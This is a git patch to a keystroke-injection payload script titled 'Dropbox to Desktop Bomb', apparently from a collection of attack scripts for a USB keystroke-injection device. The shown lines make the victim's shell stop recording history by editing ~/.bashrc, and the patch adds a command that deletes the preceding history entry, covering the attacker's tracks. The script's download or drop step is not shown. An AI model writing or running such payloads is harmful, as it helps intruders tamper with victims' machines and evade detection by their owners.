From c45f63f3a4fad7784ee98eaf6f00de9acc91371b Mon Sep 17 00:00:00 2001 From: Narsty Date: Thu, 22 Jun 2023 22:48:38 -0500 Subject: [PATCH] Update Dropbox to Desktop Bomb --- Executions/Dropbox to Desktop Bomb | 1 + 1 file changed, 1 insertion(+) diff --git a/Executions/Dropbox to Desktop Bomb b/Executions/Dropbox to Desktop Bomb index 13fa435..678587a 100644 --- a/Executions/Dropbox to Desktop Bomb +++ b/Executions/Dropbox to Desktop Bomb @@ -24,6 +24,7 @@ DELAY 500 ENTER DELAY 500 STRING echo -e "export HISTCONTROL=ignorespace\nunset HISTFILE" >> ~/.bashrc && source ~/.bashrc && exec bash +history -d $(history | tail -n 2 | head -n 1 | awk '{ print $1 }') DELAY 500 ENTER DELAY 1000